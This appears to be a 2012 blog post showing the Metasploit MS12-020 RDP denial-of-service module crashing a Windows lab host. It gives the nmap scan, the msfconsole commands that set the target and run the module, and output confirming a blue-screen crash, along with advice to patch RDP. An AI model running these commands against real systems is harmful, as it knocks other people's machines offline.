MS12-020 Metasploit Fun

25 03 2012

Metasploit contains a module to DoS Windows hosts with RDP enabled using the PoC code – patched in MS12-020

Well, it works 😀 – short & sweet….

The only known code in the wild is for DoS – so far no remote code execution – but one step generally leads to the other pretty quickly – so disable / patch / protect your RDP ASAP.

Now you see it:

root@bt:~/vpn/darknet# nmap 10.6.6.1 -p 3389

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-03-25 17:51 EST
Nmap scan report for 10.6.6.1
Host is up (0.0035s latency).
PORT STATE SERVICE
3389/tcp open ms-term-serv

Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds

64 bytes from 10.6.6.1: icmp_seq=99 ttl=127 time=2.90 ms
64 bytes from 10.6.6.1: icmp_seq=100 ttl=127 time=4.13 ms
64 bytes from 10.6.6.1: icmp_seq=101 ttl=127 time=2.85 ms

Now you dont:

root@bt:/opt/metasploit/msf3# ./msfconsole
msf > info auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options
msf auxiliary(ms12_020_maxchannelids) > set RHOST 10.6.6.1
RHOST => 10.6.6.1
msf auxiliary(ms12_020_maxchannelids) > exploit

[*] 10.6.6.1:3389 – Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 10.6.6.1:3389 – 210 bytes sent
[*] 10.6.6.1:3389 – Checking RDP status…
[+] 10.6.6.1:3389 seems down
[*] Auxiliary module execution completed
msf auxiliary(ms12_020_maxchannelids) >

From 172.16.0.1 icmp_seq=131 Destination Host Unreachable
From 172.16.0.1 icmp_seq=132 Destination Host Unreachable
From 172.16.0.1 icmp_seq=133 Destination Host Unreachable

w00t BSOD !! – DoS (Crashdump & Reboot)

Advertisements

Actions

Information

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s




%d bloggers like this: